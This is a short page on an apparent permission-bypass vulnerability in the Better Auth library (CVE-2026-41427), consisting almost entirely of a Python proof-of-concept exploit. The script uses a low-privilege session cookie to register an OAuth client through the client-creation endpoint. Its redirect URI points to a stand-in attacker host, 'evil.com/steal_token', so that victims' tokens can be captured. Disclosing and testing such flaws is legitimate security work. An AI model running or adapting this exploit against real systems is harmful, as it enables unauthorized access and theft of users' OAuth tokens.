CVE-2026-41427 Better Auth权限绕过漏洞

import requests # Exploit Title: Better Auth OAuth Client Creation Bypass # Description: Creates a malicious OAuth client by bypassing clientPrivileges checks. target_url = "https://target-domain.com/api/oauth/client/create" attacker_controlled_redirect = "https://evil.com/steal_token" # Attacker's session cookie (low privilege user) cookies = { "better-auth.session_token": "attacker_low_privilege_token" } # Payload to create a malicious client with arbitrary redirect URI payload = { "name": "Fake App", "redirect_uris": [attacker_controlled_redirect], "scopes": ["read", "write"] } try: response = requests.post(target_url, json=payload, cookies=cookies) if response.status_code == 200: print("[+] PoC Successful: Malicious OAuth client registered.") print(f"[+] Client ID: {response.json().get('client_id')}") else: print(f"[-] PoC Failed: Status {response.status_code}") except Exception as e: print(f"Error: {e}")